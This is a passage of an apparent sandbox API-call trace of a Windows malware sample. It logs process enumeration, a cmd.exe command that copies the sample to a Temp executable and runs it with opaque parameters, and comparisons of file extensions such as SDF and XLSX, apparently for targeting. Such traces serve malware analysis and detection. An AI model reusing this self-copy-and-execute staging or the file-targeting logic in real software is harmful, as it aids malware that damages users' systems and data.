hFindFile=0x1c9688) returned 1 [0111.217] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0111.217] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0111.217] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0 [0111.217] FindClose (in: hFindFile=0x1c9608 | out: hFindFile=0x1c9608) returned 1 [0111.217] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0111.217] FindClose (in: hFindFile=0x1c95c8 | out: hFindFile=0x1c95c8) returned 1 [0111.222] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x126c85c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0111.222] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0111.222] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0111.222] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x126c85c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0111.222] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0111.222] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0111.222] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\BKM66BYK.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\BKM66BYK.EXE\" [PARAMS]") returned 0xb1 [0111.222] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0111.222] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb2c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb1c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessInformation=0x12fb1c*(hProcess=0xf0, hThread=0xf4, dwProcessId=0xd2c, dwThreadId=0xd30)) returned 1 [0111.227] CloseHandle (hObject=0xf0) returned 1 [0111.227] CloseHandle (hObject=0xf4) returned 1 [0111.227] Sleep (dwMilliseconds=0xfa) [0111.505] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xec [0111.510] Process32FirstW (in: 
hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.511] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.511] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.512] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.513] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.513] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.514] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.515] Process32NextW (in: hSnapshot=0xec, 
lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.515] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0111.516] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0111.517] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.517] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.518] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.519] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.519] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 
| out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.520] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.521] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.522] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.523] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.525] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.526] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.527] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: 
lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0111.528] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.529] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.530] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.531] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.533] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0111.534] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0111.535] Process32NextW (in: hSnapshot=0xec, 
lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0111.536] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0111.537] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0111.538] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0111.540] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0111.541] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0111.542] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0111.543] Process32NextW (in: 
hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0111.544] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0111.545] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0111.546] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0111.547] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0111.548] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0111.549] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 
[0111.550] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0111.551] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0111.552] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0111.553] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0111.554] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.555] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0111.557] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="LSfkRHur.exe")) returned 1 [0111.558] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0111.560] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xcb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0111.561] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0111.562] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xcc0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0111.563] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0111.565] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xccc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0111.566] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xcec, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="PING.EXE")) returned 1 [0111.567] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0111.568] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0111.569] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0111.570] CloseHandle (hObject=0xec) returned 1 [0111.570] CharUpperBuffW (in: lpsz="sdf", cchLength=0x3 | out: lpsz="SDF") returned 0x3 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="SDF", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0111.570] CharUpperBuffW (in: lpsz="sdf", cchLength=0x3 | out: lpsz="SDF") returned 0x3 [0111.570] CharUpperBuffW (in: lpsz="sdf", cchLength=0x3 | out: lpsz="SDF") returned 0x3 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="SDF", cchCount1=3, lpString2="SDF", cchCount2=3) returned 2 [0111.570] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="SDF", cchCount2=3) returned 3 [0111.570] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="XLSX", cchCount2=4) returned 1 [0111.570] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.570] 
CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.570] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.570] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xls", cchLength=0x3 | out: lpsz="XLS") returned 0x3 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLS", cchCount1=3, lpString2="XLSX", cchCount2=4) returned 1 [0111.571] CharUpperBuffW (in: lpsz="xls", cchLength=0x3 | out: lpsz="XLS") returned 0x3 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="XLS", cchCount2=3) returned 1 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLSX", cchCount1=4, lpString2="XLS", cchCount2=3) 
